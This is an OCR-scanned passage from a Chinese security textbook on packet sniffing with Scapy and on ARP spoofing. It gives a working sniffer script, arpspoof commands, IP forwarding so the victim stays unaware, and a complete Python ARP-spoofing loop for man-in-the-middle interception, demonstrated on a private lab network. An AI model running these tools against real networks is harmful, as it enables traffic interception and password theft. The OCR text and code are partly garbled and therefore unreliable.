法 让 设备 A 误 认为 攻击 者 的 计算 机 才 是 设备 B， 同 时 还 会 设法 让 设备 B 误 认为 攻击 者 的 计算 
机 是 设备 A， 从 而 将 A 和 B 之 间 的 通信 全 都 经 过 攻击 者 的 设备 。 

当然 ， 除 了 黑客 会 使 用 这 些 抓 包 工具 之 外 ， 网 络 安全 人 员 也 会 使 用 这 些 抓 包工 具 ， 利 用 
这 些 工具 也 可 以 用 来 发 现 黑客 的 不 法 入 侵 行为 。 

本 章 中 将 就 如 下 两 点 技术 进行 讨论 。 


+ 
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(1) 网 络 数据 的 嗅 探 。 在 Kali Linux 2 中 提供 了 很 多 可 以 用 来 实现 网 络 数据 嗅 探 的 工具 ， 
其 实 这 些 工具 都 是 基于 相同 的 原理 。 所 有 通过 你 网 卡 的 网 络 数 据 都 是 可 以 被 读 取 的 。 这 些 网 
络 数据 按照 各 种 各 样 不 同 的 协议 组 织 到 了 一 起 。 所 以 只 要 掌握 了 各 种 协议 的 格式 ， 就 可 以 分 
析出 这 些 数据 所 表示 的 意义 。 当 然 ， 目 前 互联 网 上 所 使 用 的 协议 数目 众多 ， 而 且 还 在 不 断 的 
增长 中 (也 许 将 来 有 一 天 ， 互 联网 中 所 使 用 的 某 种 协议 就 是 由 你 设计 的 )， 在 学 习 的 时 候 ， 只 
需要 掌握 这 些 协议 中 最 为 重要 的 部 分 即 可 。 

(2) 网 络 数据 的 欺骗 。 在 互联 网 创建 之 初 ， 提 供 的 服务 和 使 用 的 人 员 都 很 少 ， 因 此 无 须 
考虑 安全 方面 的 问题 。 所 以 作为 互联 网 协议 基础 的 几 个 重要 协议 都 没有 使 用 安全 措施 。 但 是 
随 着 互联 网 的 规模 越 来 越 大 ， 使 用 者 也 越 来 越 多 ， 一 些 抱 有 其 他 想法 的 人 也 开始 使 用 互联 网 
了 。 他 们 开始 利用 互联 网 的 缺陷 纂 改 网 络 数据 来 实现 自己 的 目的 ， 这 些 人 一 开始 可 能 只 是 出 
于 恶作剧 或 者 炫 漆 的 目的 ， 而 渐渐 地 发 展 成 为 一 种 破坏 甚至 伍 财 的 手段 。 例如， 我 们 都 十 分 
了 和 解 的 ICMP， 也 就 是 当主 机 A 向 主机 B 发 送 一 个 ICMP 请 求 的 时 候 ， 主机 B 会 向 主机 A 
回复 一 个 ICMP 回应 。 如 果 伪 造 一 个 由 主机 人 A 发 出 的 ICMP 请 求 ， 并 将 这 个 数据 包 发 送 给 很 
多 主机 ， 那 么 这 些 主机 就 都 会 向 主机 A 发 回 一 个 ICMP 回应 ,主机 A 就 不 得 不 使 用 大 量 的 资 
源 来 处 理 这 些 回 应 。 

如 果 想 要 彻底 了 解 一 个 网 络 ， 那 么 最 好 的 办 法 就 是 对 网 络 中 的 流量 进行 嗅 探 。 在 本 章 中 
将 会 编写 几 个 嗅 探 工具 ， 这 些 噢 探 工具 可 以 用 来 窃取 网 络 中 明文 传输 的 密码 ， 监 视 网 络 中 的 
数据 流向 ， 甚 至 可 以 收集 远程 登录 所 使 用 的 NTLM 数据 包 (这 个 数据 包 中 包含 登录 用 的 用 户 
名 和 使 用 Hash 加 密 的 密码 )。 
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8.1.1 编写 一 个 网 络 嗅 探 工具 


在 Scapy 中 提供 了 一 种 专门 用 来 捕获 数据 包 的 函数 smiff()， 这 个 函数 的 功能 十 分 强大 ， 
首先 使 用 help 函数 来 查看 一 下 它 的 使 用 方法 ， 如 图 8-1 所 示 。 

函数 sniff() 中 可 以 使 用 多 个 参数 ， 下 面 先 来 了 解 其 中 几 个 比较 重要 参数 的 含义 。 

(1 ) count: 表示 要 捕获 数据 包 的 数量 。 默 认 值 为 0， 表示 不 限制 数量 。 

(2) store: 表示 是 否 要 保存 捕获 到 的 数据 包 ， 默 认 值 为 1。 

(3 ) pm: 这 个 参数 是 一 个 函数 ， 这 个 函数 将 会 应 用 在 每 一 个 捕获 到 的 数据 包 上 。 如 果 这 
个 函数 有 返回 值 ， 将 会 显示 出 来 。 默 认 是 空 。 

(4) iface: 表示 要 使 用 的 网 卡 或 者 网 卡 列表 。 
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Help on function sniff in module scapy.sendrecv 


ding) 
d of sniffing them 


top sniffing given ult: None) 
ocket: use t 


stop filter: py applie 
if have to stop the capt 
ilter = lambda x 


图 8-1 函数 sniff0 的 用 法 
另外 ， 由 于 直接 使 用 这 个 函数 会 捕获 到 整个 网 络 的 通信 ， 这 样 会 导致 大 量 数据 的 出 现 
如 果 不 加 以 过 滤 ， 将 会 很 难 从 里 面 找 到 需要 的 数据 包 。 因 此 sniff() 还 支持 了 过 滤器 的 使 用 ， 
这 个 过 滤器 使 用 了 一 种 功能 非常 强大 的 过 滤 语 法 一 一 “伯克利 包 过 滤 ” 语 法 。 这 个 规则 简称 
为 BPF， 利 用 它 可 以 确定 该 获取 和 检查 哪些 流量 ,忽略 哪些 流量 。BPF 可 以 帮助 我 们 通过 比 
较 各 个 层 协议 中 数据 字段 值 的 方法 mga masan 
BPF 的 主要 特点 是 使 用 一 个 名 为 “ 原 语 ”的 方法 来 完成 对 网 络 数据 包 的 描述 ， 例 如 ， 可 
以 使 用 “host” 来 描述 主机 ,“port” Ne BAN, 同时 也 支持 “与 "“ 或 "“ 非 ”等 逻辑 运算 
可 以 限定 的 内 容 包 括 地 址 、 协 议 等 
使 用 这 种 语法 创建 出 来 的 过 滤器 被 称 为 BPF 表达 式 ， 每 个 表达 式 包含 一 个 或 多 个 原 语 ， 
每 个 原 语 中 又 包含 一 个 或 多 个 限定 词 ， 主 要 有 三 个 限定 词 : Type. Dir 和 Proto。 
(1) Type 用 来 规定 使 用 名 字 或 数字 代表 的 类 型 ， 例 如 host. net 和 port 等 。 
) Dir 用 来 规定 流量 的 方向 ， 例 如 src. dst 和 src and dst 等 
(3) Proto 用 来 规定 匹配 的 协议 ， 例 如 ip、tcp 和 arp 等 
“ host 192.168.169.133” 就 是 一 条 最 为 常见 的 过 滤器 ， 它 用 来 过 滤 掉 除 了 本 机 和 
192.168.169.133 以 外 的 所 有 流量 。 如 果 和 希望 再 将 范围 限制 小 一 些 ， 例 如 ， 只 捕获 tep 类 型 的 
流量 就 可 以 使 用 “与 ”运算 符 ， 如 “host 192.168.169.133 && tep” 
下 面 给 出 一 些 常见 的 过 滤器 。 
) 只 捕获 与 网 络 中 某 一 个 IP 的 主机 进行 交互 的 流量 :“host 192.168.1.1” 
) 只 捕获 与 网 络 中 某 一 个 MAC 地 址 的 主机 交互 的 流量 :“ ether host 00-1a-a0-52- 


e2-a0”。 


只 捕获 来 自 网 络 中 某 一 个 IP 的 主机 的 流量 :“src host 192.168.1.1”。 
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(4) 只 捕获 去 往 网 络 中 某 一 个 IP 的 主机 的 流量 :“dst host 192.168.1.1”, host 也 可 以 省 略 。 
(5) 只 捕获 23 端口 的 流量 :“port 23”。 
) 捕获 除了 23 端口 以 外 的 流量 :“1!23”。 

(7) 只 捕获 目的 端口 为 80 的 流量 : “dst port 80”- 

) 只 捕获 ICMP 流量 :“icmp”。 
(9) 只 捕获 type 为 3，code 为 0 的 ICMP 流量 :“icmp[0] = 3 &&icmp[1] = 0 
下 面 使 用 sniff() 来 捕获 一 些 数据 包 并 显示 出 来 ， 例 如 ， 源 地 址 为 192.168.169.133 ， 端 
为 80 的 tcp 报 文 ， 如 图 8-2 所 示 。 


Welcome to Scapy (unknown yersion) 


sniff(filter="dst 192.168.169.133 and tcp port 80") 


图 8-2 ”使 用 了 过 滤器 的 sniffO 
这 时 Scapy 就 会 按照 要 求 开始 捕获 所 需要 的 数据 包 
如 果 和 希望 即时 显示 捕 es 就 可 以 使 用 pr 函数 选项 ， 函 数 的 内 容 为 prn=lambda 
x:x.summary(), fE sniff) 中 加 入 这 个 选项 ， 如 图 8-3 所 示 


sniff(filter="dst 192.168.169.133 and tcp port 80",prn=lambda x:x.summary()) 


Ether IP / TCP 
Ether IP.7 TCP QS 


图 8-3 ”使 用 了 函数 的 sniffO 
利用 pm 就 可 以 不 断 地 打印 输出 捕获 到 的 数据 包 的 内 容 。 另 外 ， 这 个 函数 可 以 实现 很 多 
功能 ， 例 如 输出 其 中 的 某 一 个 选项 ， 本 例 中 就 是 使 用 x[IP].sre 输出 IP 报 文 的 目的 地 址 ， 如 图 
8-4 所 示 ， 


st 192.168.169.133 and tcp port 80",prn=lambda x:x[IP].src,count=5) 


图 8-4 使 用 了 输出 函数 的 sniffO 
另外 ， 也 可 以 定义 一 个 回调 函数 ， 例 如 ， 打 印 输出 这 个 数据 包 。 


def Callback (packet): 
printpacket.show() 


然后 再 在 sniff0 中 调用 这 个 函数 : 
sniff (prn=Callback) 


这 些 捕获 到 的 数据 包 可 以 使 用 wrpcap 函数 保存 起 来 ， 保 存 的 格式 很 多 ， 目 前 最 为 通用 
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的 格式 为 pcap。 例 如 ， 现 在 捕获 5 个 数据 包 并 保存 起 来 的 语句 如 下 所 示 。 


>>>packet=sniff(count=5) * 
>>>wrpcap ("demo .pcap", packet) 


接 下 来 编写 一 个 完整 的 数据 嗅 探 工具 ， 它 可 以 捕获 和 特定 主机 通信 的 1000 个 数据 包 ， 
并 保存 到 catch.pcap 数据 包 中 。 


fromscapy.all import * 

import sys 

iflen(sys.argv) !=2: 

print ('Usage:catchPackets<IP>\n eg: catchPackets 192.168.1.1') 
sys.exit(1) 

ip sys.argv[1] 

def Callback (packet): 

printpacket.show() 

packets=sniff (filter="host "+ip,prn=Callback,count=5) 

wrpcap ("catch.pcap",packets) 


把 这 个 程序 放 在 Aptana Studio 3 中 完成 ， 将 这 个 程序 以 “ catchPackets.py” 为 名 保存 
起 来 ， 在 Run Configurations 中 为 这 个 程序 指定 一 个 参数 “192.168.169.133”， 然 后 执行 。 然 
后 与 “192.168.169.133” 主 机 进行 通信 (为 了 产生 数据 包 )， 这 里 使 用 的 方法 是 执行 “ ping 
192.168.169.133”"， 执 行 catchPackets.py 的 结果 如 图 8-5 所 示 。 


E) Console x |m root@kati: ~ Problems Fù PyUnit = u 


<terminated> 192.168.169.133 
###[ Ethernet ]### 
dst a HMH: NN 


# x 9 9 G a DOB 27r” 


src = 00:0c:29:2d:7f:89 
ype = 0x806 
###[ ARP ]### 
hwtype 0x1 
ptype = 0x800 
hwlen =6 
plen sA 
op = who-has 
hwsrc = 00:0c:29:2d:7f:89 
psrc = 192.168.169.133 
hwdst = 00:00:00:00:00:00 


pdst = 192.168.169.2 
###[ Padding 1### 
toad 


= '\x00\x00\x00\x00\ x00) x00\ x00 x00Xx00x00Vx00Vx00Vx00Vx€ 
` 


图 8-5 执行 catchPackets.py 的 结果 


保存 的 catch.pcap 数据 包 如 图 8-6 所 示 。 
PI 


=" =" =" 
= = = = 
cap- catch.pcap | contacts- contacts- 
20171025. dump- dump- 
pcap 20170819.. 20170819... 


图 8-6 保存 的 catch.pcap 数据 包 
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8.1.2 调用 WireShark 来 查看 数据 包 
前 面 已 经 介绍 了 如 何 使 用 Scapy 捕获 这 些 数据 包 ,， 但 是 在 Scapy 中 查看 这 些 数据 包 可 能 
有 些 杂乱 ， 可 以 将 数据 包 放 到 更 加 专业 的 工具 中 来 查看 ， 首 先 在 Scapy 中 产生 一 个 数据 包 。 
>>>packets = IP(dst="www.baidu.com") /ICMP() 
然后 可 以 将 这 个 数据 包 放 在 一 个 极为 优秀 的 网 络 分 析 工 具 中 打开 。 
>>>wireshark (packets) 


图 8-7 是 WireShark 的 工作 界面 。 


scapyZYeNKF °° 

File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 
TODARA a < + a. ZEE aa a E 

[R| Apply a display fitter — <CU/> E -] Expression. + j| 

No. Time Source Destination Protocol Ler Info 


ü 
> Frane 1: 28 bytes on wire (224 bits), 28 bytes captured (224 bits) 
Raw packet data 


> Internet Protocol version 4, Src: 192.168.169.130, Dst: 220.181.112.244 
» Internet Control Message Protocol 


2 


0090 45 00 60 1c CO C1 CO 0O 40 01 c3 Ha co a8 að 82 E....... [PT 
0010 de b5 70 f4 68 G@ f7 ff 00 00 00 al P 


3 


图 8-7 WireShark 的 工作 界面 


启动 之 后 的 WireShark 可 以 分 成 三 个 面板 部 分 ，1 是 数据 包 列 表 ，2 是 数据 包 详细 信息 ， 
3 是 数据 包 原 始 信 息 。 这 三 个 面板 是 相互 关联 的 ， 当 在 数据 包 列 表 中 选中 一 个 数据 包 之 后 ， 
在 数据 包 信 息 面板 处 就 可 以 查看 这 个 数据 包 的 详细 信息 ， 在 数据 包 原 始 信息 面板 处 就 可 以 看 
到 这 个 数据 包 的 原始 信息 。 

一 般 而 言 ， 数 据 包 详细 信息 中 包含 的 内 容 是 我 们 最 为 关心 的 。 一 个 数据 包 通 常 都 需要 使 
用 多 个 协议 ,这 些 协 议 一 层 层 地 将 要 传输 的 数据 包装 起 来 ， 例 如 ， 图 8-8 中 展示 了 刚刚 产生 
的 数据 包 。 


> Frane 1: 28 bytes on wire (224 bits), 28 bytes captured (224 bits) 
Raw packet data 


> Internet Protocol version 4, Src: 192.168.169.130, Dst: 220.161.112.244 
> Internet Control Message Protaco: 


图 8-8 数据 包 的 层次 
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图 8-8 中 的 数据 包 一 共 分 成 三 屋 ， 依 次 为 Frame、IP、ICMP， 每 一 层 前 面 有 一 个 黑色 的 
三 角形 图 标 ， 单 击 这 个 图 标 可 以 展开 数据 包 这 一 层 的 详细 信息 ， 例 如， 查看 一 下 这 个 数据 包 
中 ICMP 的 详细 信息 就 可 以 单 击 前 面 的 三 角形 图 标 ， 如 图 8-9 所 示 。 


> Frane 1: 28 bytes on wire (224 bits), 28 bytes captured (224 bits) 
Raw packet data 
» Internet Protocol Version 4, Src: 192.108.169.130, DSt: 220.181.112.244 
~ Internet Control Message Protocol 
Type: 8 (Echo (ping) request) 
Code: 9 
Checksun: @xf7ff [correct] 
[Checksum Status: Good 
Identifier (BE): © (0x0960) 


Sequence number (BE): 9 (0x0000) 


Sequence number (LE): © (0x0000) 
» [No response seen] 


图 8-9 数据 包 中 ICMP 的 详细 信息 


8.2 ARP 的 原理 与 缺陷 


在 前 面 使 用 ARP 对 目标 主机 状态 进行 扫描 的 时 候 已 经 详细 介绍 了 ARP， 现 在 简单 回顾 
一 下 。 之 所 以 这 里 特别 提 到 这 个 协议 ， 是 因为 目前 网 络 中 大 部 分 的 监听 和 欺骗 技术 都 是 源 于 
这 个 协议 

ARP 的 主要 原因 是 以 太 网 中 使 用 的 设备 交换 机 并 不 能 识别 他 地址 ， 而 只 能 识别 硬件 地 
址 。 在 交换 机 中 使 用 一 个 内 容 寻 址 寄存 表 (CAM)， 这 个 表 中 列 出 了 交换 机 每 一 个 端口 所 连 
接 设 备 的 硬件 地 址 


Mac Address Ports 
Fa0/1 
Fa0/2 
当 交 换 机 收 到 了 一 个 发 往 特定 硬件 地 址 的 数据 包 (例如 11: 11: 11: 11: 11: 11 ) 的 时 候 ， 


Me kanaa, Ty 
既然 软件 中 使 用 的 都 是 了 P 地 址 ， 而 交换 机 使 用 的 却 是 硬件 地 址 ， 那 么 这 个 过 程 中 一 定 
` s. IP 地 址 和 硬件 地 址 的 转换 ， 而 这 个 转换 是 在 什么 时 候 发 生 的 呢 ? 
S ne 在 每 一 台 支 持 ARP 的 主机 中 都 有 一 个 
B, 个 表 中 保存 了 已 知 的 IP 地 址 与 硬件 地 址 的 对 应 关系 ， 如 图 8-10 所 示 。 


图 8-10 ARP 表 的 内 容 
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这 里 给 出 了 一 个 Windows 操作 系统 中 ARP 表 ， 查 看 这 个 表 的 命令 为 “ LERE 
分 为 三 列 ， 分 别 是 IP 地 址 、 物 理 地 址 ( 即 硬件 地 址 ) 和 类 型 。 

例如 ， 如 果 需 要 和 192.168.1.1 通信 ， 就 首先 查找 表 项 ， 当 找到 这 一 项 之 后 ， 就 会 将 这 个 
数据 包 添 加 一 个 硬件 地 址 dc-fe-18-58-8c-3b。 这 样 交 给 交换 机 之 后 ， 就 可 以 由 它 发 送 到 目的 
地 了 。 

如 果 需 要 和 192.168.1.2 通信 ， 也 首先 查找 表 项 ， 但 是 找 不 到 对 应 的 表 项 ， 所 以 此 时 不 知 
道 主 机 192.168.1.2 的 物理 地 址 ， 这 时 就 需要 使 用 ARP 了 。 主 机 需要 先 发 出 一 个 ARP 请 求 ， 
内 容 大 概 就 是 “注意 了 ， 我 的 卫 地 址 192.168.1.100, 我 的 物理 地 址 是 22: 22: 22: 22: 22: 22, 
IP 地 址 为 192.168.1.2 的 主机 在 吗 ， 我 需要 和 你 进行 通信 ， 请 告诉 我 你 的 物理 地 址 ， 收 到 请 
回答 !”。 这 个 数据 包 是 以 广播 的 形式 发 送 给 网 段 中 的 所 有 设备 的 ， 不 过 只 有 目标 主机 会 给 出 
回应 ， 目 标 主机 会 首先 将 192.168.1.100 和 22: 22: 22: 22: 22: 22 作为 新 的 表 项 添加 到 ARP 表 
中 。 目 标 主 机 的 回应 包 大 概 就 是 “ 叶 ， 我 就 是 那个 逻辑 地 址 为 192.168.1.2 的 主机 ， 我 的 物理 
地 址 是 33: 33: 33: 33: 33: 33”。 解 析 过 程 完成 后 ， 就 会 将 这 个 表 项 添加 到 ARP 表 中 。 

但 是 这 个 协议 存在 一 个 重大 缺陷 就 是 这 个 过 程 并 没有 任何 的 认证 机 制 ， 也 就 是 说 如 果 
一 台 主 机 收 到 ARP 请 求 数据 包 ， 形 如 “注意 了 ,我 的 他 地 址 是 192.168.1.100， 我 的 物理 地 
址 是 22: 22: 22: 22: 22: 22, IP 地 址 为 192.168.1.2 的 主机 在 吗 ， 我 需要 和 你 进行 通信 ， 请 告 
诉 我 你 的 物理 地 址 ， 收 到 请 回答 ! ”的 数据 包 ， 并 没有 对 这 个 数据 包 进 行 真 伪 判 断 ， 无 论 这 
个 数据 包 是 否 真 的 来 自 192.168.1.100， 都 会 将 其 添加 到 ARP 表 中 。 因 此 黑客 就 可 能 会 利用 
这 个 漏洞 来 冒充 网 关 等 主机 。 


8.3 ARP 其 骗 的 原理 


现在 演示 一 次 ARP 欺骗 的 过 程 ， 这 次 欺骗 中 实现 了 对 目标 主机 与 外 部 通信 的 监听 。 在 
实例 中 ， 所 使 用 的 主机 Kali Linux 2 中 的 网 络 配置 如 下 。 

(1) 了 地 址 : 192.168.169.130。 

(2 ) 硬件 地 址 : 00:0c:29:12:dd:23 。 

(3 ) 网 关 : 192.168.169.2。 

而 要 欺骗 的 目标 主机 的 网 络 配置 如 下 。 

(1) IJ 地 址 : 192.168.169.133- 

(2 ) 硬件 地 址 : 00:0c:29:2D:7F:89. 

(3 ) 网 关 : 192.168.169.2。 

网 关 的 信息 如 下 。 

(1) 卫 地 址 : 192.168.169.2- 
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(2 ) 硬件 地 址 : 00:50:56:f5:3e:bb. 
在 正常 情况 下 ， 查 看 一 下 目标 主机 的 ARP 表 ， 如 图 8-11 所 示 。 


99-59-56-c9-909-98 


09-50-56 
DOU -29717 


@0-56-56-fc— 


图 8-11 目标 主机 的 ARP 表 
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这 时 的 目标 主机 没有 受到 任何 攻击 ， 所 以 里 面 的 ARP 表示 是 正确 的 ， 当 目标 主机 上 程 
序 要 通信 的 时 候 ， 例 如 ， 访 问 一 个 外 网 地 址 “ www.163.com” 的 时 候 ， 这 时 会 首先 将 数据 包 


交 给 网 关 ， 再 由 网 关 通 过 各 种 路 由 


办 议 送 到 “www.163.com” 处 


设置 的 网 关 地 址 为 192.168.169.2， 按 照 ARP 表 中 的 对 应 硬件 地 址 为 00:50:56:f5:3e:bb， 


这 样 所 有 的 数据 包 都 发 往 这 个 硬件 


地 址 了 


现在 只 需要 想 办 法 修改 目标 主机 的 ARP 表 中 的 192.168.169.2 表 项 即 可 。 修 改 的 方法 很 
简单 ， 因 为 ARP 中 规定 ， 主 机 只 要 收 到 一 个 ARP 请 求 之 后 ， 不 会 判断 这 个 请 求 的 真 伪 ， 就 


会 直接 将 请 求 中 的 了 PP 地址 和 硬件 地 址 添加 到 ARP 表 中 


就 对 其 修改 ， 这 种 方式 称 为 动态 ARP 表 
首先 使 用 一 种 工具 来 演示 这 个 实例 。 在 Kali Linux 2 中 提供 了 很 多 可 以 实现 网 络 欺骗 的 
工具 ， 首 先 以 其 中 最 为 典型 的 arpspoof 来 演示 一 下 ， 首 先 在 Kali Linux 2 中 打开 一 个 终端 ， 


输入 “arpspoof” 就 可 以 启动 这 个 


# arpspoof 
4 


LAB, WWE 8-12 所 示 


spoof [-i inte 
图 

这 个 工具 的 使 用 格式 为 : 

arpspoof [-i 指定 使 用 的 网 卡 ] 


现在 主机 他 地 址 为 192.168.169.130， 要 欺骗 的 目标 主机 IP 地 址 为 192.168.169.133。 
在 这 个 网 络 的 网 关 是 192.168.169.2， 所 有 主机 与 外 部 的 通信 都 是 通过 这 一 台 主 机 完成 的 ， 


rface] [-c own|host|both] [-t target] [-r] host 


8-12 在 终端 中 启动 arpspoof 


[i-t 要 欺 编 的 目标 主机 ] [-r] 要 伪装 成 的 主机 


以 只 需要 伪装 成 网 关 ， 就 可 以 截获 到 所 有 的 数据 。 实 验 中 所 涉及 的 主机 包括 以 下 各 项 。 


(1) 攻击 者 : 192.168.169.130 


(2 ) 被 欺骗 主机 : 192.168.169.133。 


(3 ) 默认 网 关 : 192.168.169.2 
下 面 就 使 用 arpspoof 来 完成 一 


次 网 络 欺骗 。 


root@kali: ~ # arpspoof -i eth0 -t 192.168.169.133 192.168.169.2 


执行 的 过 程 如 图 8-13 所 示 。 


如 果 之 前 有 了 相同 IP 地 址 的 表 项 ， 


现 
所 
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r 


File Edit View 


图 8-13 正在 进行 攻击 的 arpspoof 
现在 受到 欺骗 的 主机 192.168.169.133 就 会 把 192.168.169.130 当 作 网 关 ， 从 而 把 所 有 的 数 
据 都 发 送 到 这 个 主机 ， 在 主机 192.168.169.133 上 查看 ARP 表 就 可 以 看 到 ， 此 时 192.168.169.2 
与 192.168.169.133 的 MAC 地 址 是 相同 的 ， 如 图 8-14 所 示 。 


5A-5fh-cA-ANA—AR 
Bc-29-12-dd-23 
8c-29-12-dd-23 
PH-bo-Fc -Te 


图 8-14 被 欺骗 主机 的 ARP 表 
现在 arpspoof 完成 了 对 目标 主机 的 欺骗 任务 ， 可 以 截获 到 目标 主机 发 往 网 关 的 数据 包 
但 是 这 里 有 两 个 问题 ， 首 先 arpspoof 仅仅 是 会 截获 这 些 数据 包 ， 并 不 能 查看 这 些 数据 包 ， 所 
以 还 需要 使 用 专门 查看 数据 包 的 工具 ， 例 如 ， 现 在 在 Kali Linux 2 中 打开 WireShark， 就 可 以 
看 到 由 192.168.169.133 所 发 送 的 数据 包 ， 如 图 8-15 所 示 


Desunation Protocot Length Info 


29 25,515215913 192.168.169.2 
31 26. 242003189 D 

32 27 053621923 h 2 
33 27 .818806117 Ü 192.168.169.255 
35 28 256213631 3 192.168.169.2 


36 28 ER z2 168.169.133 192.168.169.255 
h 69 133 2 


49 43. 855691386 168 169 135 192.168 169.2 
51 45.868331049 þ92.168.169.133 192.168.169.2 
54 49.877560076 ẸL92.168.169.133 192.168.169.2 73 Standard qi 


图 8-15 WireShark 捕获 的 数据 包 
但 是 主机 也 不 会 再 将 这 些 数据 包 转 发 到 网 关 ， 这 样 将 会 导致 目标 主机 无 法 正常 上 网 ， 所 
以 需要 在 主机 上 开启 转发 功能 。 首 先 打开 一 个 终端 ， 开启 的 方法 如 下 所 示 。 
root@kali: ~ # echo 1 >> /proc/sys/net/ipv4/ip forward 
这 样 就 可 以 将 截获 到 的 数据 包 再 转发 出 去 ， 被 欺骗 的 主机 就 可 以 正常 上 网 了 ， 从 而 无 法 
觉 到 受到 攻击 。 


84 中间 人 欺骗 


现在 就 用 Python 语言 来 编写 一 个 能 实现 ARP 欺骗 功能 的 程序 。 仍 然 以 8.3 节 中 的 例子 
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来 进行 这 个 实验 ， 这 个 程序 的 核心 原理 就 是 构造 一 个 如 下 的 数据 包 。 

(1) 源 卫 地 址 : 192.168.169.2 (也 就 是 网 关 的 卫 地 址 )。 

2) 源 硬 件 地 址 : 00:0c:29:12:dd:23 (也 就 是 Kali Linux 2 虚拟 机 的 硬件 地 址 ) 

(3) 目标 卫 地址 : 192.168.169.133 (要 欺骗 主机 的 IP 地 址 )。 

) 目标 硬件 地 址 : 00:0c:29:2D:7F:89. 

(5) ARP 类 型 : request. 

这 里 仍然 使 用 Scapy 和 首先 在 终端 中 输入 “ Scapy”， 进 入 Scapy 命令 
行 。 在 命令 行 中 再 来 看 一 遍 ARP 数据 包 的 格式 ， 如 图 8-16 所 示 


ts (ARP) 
: XShortField 
hortEnumField 
: ByteField 
: ByteField 
ortEnumField 


(1) 
(2048) 
(6) 
(4) 
(1) 
(None) 
(None) 
'00:00:00:00:00:00') 


: ARPSourceMACField 


nunun 


图 8-16 ARP 数据 包 的 格式 
这 里 需要 设置 的 值 主要 有 三 个 : op 、psrc 和 pdst。 其 中 ，op 对 应 的 是 ARP 类 型 ， 默 认 
值 已 经 是 1， 就 是 ARP 请 求 ， 无 须 改变 ; psrc 的 值 最 关键 ，psrc 对 应 前 面 的 源 卫 地 址 ， 这 
里 要 设置 为 192.168.169.2; pdst 的 值 设置 为 192.168.169.133 


>>>gatewayIP="192.168.169.2" 
>>>victimIP="192.168.169.133" 


另外 ， 需 要 使 用 Ether 层 将 这 个 数据 包 发 送出 去 ， 查 看 一 下 Ether 数据 包 的 格式 ， 如 
图 8-17 所 示 。 


ls(Ether) 
: DestMACField = (None) 


SourceMACField 
XShortEnumField 


图 8-17 Ether 数据 包 的 格式 
这 一 层 只 有 三 参数 ， dst 是 目的 硬件 地 址 ,src 是 源 硬 件 地 址 dst 填 写 
00:0c:29:2D:7F:89， 而 src 填写 的 是 Kali Linux 2 的 硬件 地 址 00:0c:29:12:dd:23。 


>>>srcMAC="00:0c:29:12:dd:23" 
>>>dstMAC="00:0c:29:2D:7F:89" 


接 下 来 构造 并 发 送 这 个 数据 包 。 
>>>sendp( Ether (dst=dstMAC, src=srcMAC) /ARP ( psrc=gatewayIP,pdst=victimIP) 


需要 注意 的 是 ， 即 使 不 为 Ether 中 的 dst 和 src 赋值 ， 系 统 其 实 也 会 自动 将 sre 的 值 设 置 
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为 使 用 Kali Linux 2 主机 的 硬件 地 址 ， 并 根据 目的 正 的 值 填写 ， 也 就 是 下 面 的 写法 和 之 前 是 
一 样 的 。 
>>>sendp (Ether () /ARP (psrc=gatewayIP,pdst=victimIP)) 


成 功 发 送 这 个 数据 包 之 后 ， 查 看 一 下 被 攻击 计算 机 的 ARP 缓存 表 ， 如 图 8-18 所 示 。 


图 8-18 被 攻击 计算 机 的 ARP 缓存 表 
现在 编写 一 个 完整 的 ARP 欺骗 程序 


import sys 
from scapy.all import sendp, ARP, Ether 
if len(sys.argv)!=3: 
print sys.argv[0] + ": <target><spoof_ip>" 
sys.exit(1) 
victimIP=sys.argv[1] 
gatewayIP=sys.argv[2] 
packet=Ether () /ARP (psrc=gatewayIP,pdst=victimIP) 
while 1: 
sendp (packet) 
time.sleep (10) 
print packet.show() 


将 参数 设置 为 “192.168.169.133 192.168.169.2”"， 执 行 的 结果 如 图 8-19 所 示 


© Console x |W] root@kali:~ 口 Problems Fi PyUnit 


a sa 所 加 图 图 


192.168.169.2 


Sent 1 packets. 
###[ Ethernet ]### 


dst = 00:0c:29:2d:7f:89 
src = 00:0c:29:12:dd:23 
type = 0x806 


###[ ARP ]### 


ptype = 0x800 

hwlen =6 

plen =4 

op = who-has 

hwsrc = 00:0c:29:12:dd:23 
psrc = 192.168.169.2 
hwdst = 00:00:00:00:00:00 


192.168.169.133 


图 8-19 ”该 程序 执行 的 结果 


在 目标 主机 192.168.169.133 中 查看 ARP 缓存 表 ， 可 以 看 到 这 时 这 个 缓存 表 已 经 受到 欺骗， 
192.168.169.2 和 192.168.169.130 对 应 的 硬件 地 址 都 变 成 “00:0c:29:12:dd:23”， 如 图 8-20 所 示 。 
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-t£-gp—-pg-te- 


图 8-20 受到 欺骗 的 ARP 缓存 表 
也 可 以 将 这 个 程序 再 完善 一 下 ， 例 如， 将 8.1 节 中 讲 到 的 网 络 嗅 探 功能 也 加 进来 ， 同 时 
欺骗 受害 者 主机 和 网 关 ， 将 硬件 地 址 改 为 自动 获取 等 。 首 先 编写 一 个 能 获取 目标 硬件 地 址 的 
函数 
Scapy 中 有 一 个 getmacbyip() 函数 ， 这 个 函数 的 作用 是 给 出 指定 IP 地 址 主机 的 硬件 地 址 
在 Python 中 使 用 这 个 函数 来 获取 192.168. 169.133 的 硬件 地 址 ， 这 个 过 程 如 图 8-21 所 示 


>>> from scapy.all import getmacbyip 
>>> getmacbyip("192.168.169.133") 


'00:0c:29:2d:7f:89' 


图 8-21 获取 192.168.169.133 的 硬件 地 址 


如 果 要 开始 的 是 一 次 中 间 人 欺骗 ， 那 么 需要 同时 对 目标 主机 和 网 关 都 进行 欺骗 ， 本 来 目 
标 主 机 与 网 关 之 间 的 过 程 如 图 8-22 所 示 


— 


RE 网 关 
目标 主机 
192.168.169.133 192.168.169.2 


8 


Kali Linux 2 
192.168.169.130 


图 8-22 ”正常 的 通信 过 程 
而 中 间 人 欺骗 的 原理 就 是 要 让 目标 主机 误 认为 Kali Linux 2 才 是 网 关 ， 同 时 让 网 关 误 认 
为 Kali Linux 2 才 是 目标 主机 ， 这 样 两 者 之 间 的 通信 方式 就 变 成 了 如 图 8-23 所 示 的 形式 。 
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& 


目标 主机 


网 关 
192.168.169.133 ` 0 192.168.169.2 


Kali Linux 2 
192.168.169.130 


图 8-23 被 监听 的 通信 过 程 


要 实现 这 一 点 就 需要 同时 向 目标 主机 和 网 关 发 送 欺 骗 数据 包 。 用 来 欺骗 目标 主机 的 数据 
包 如 下 。 

attackTarget=Ether () /ARP (psrc=gatewayIP,pdst=victimIP) 

用 来 欺骗 网 关 的 数据 包 如 下 。 

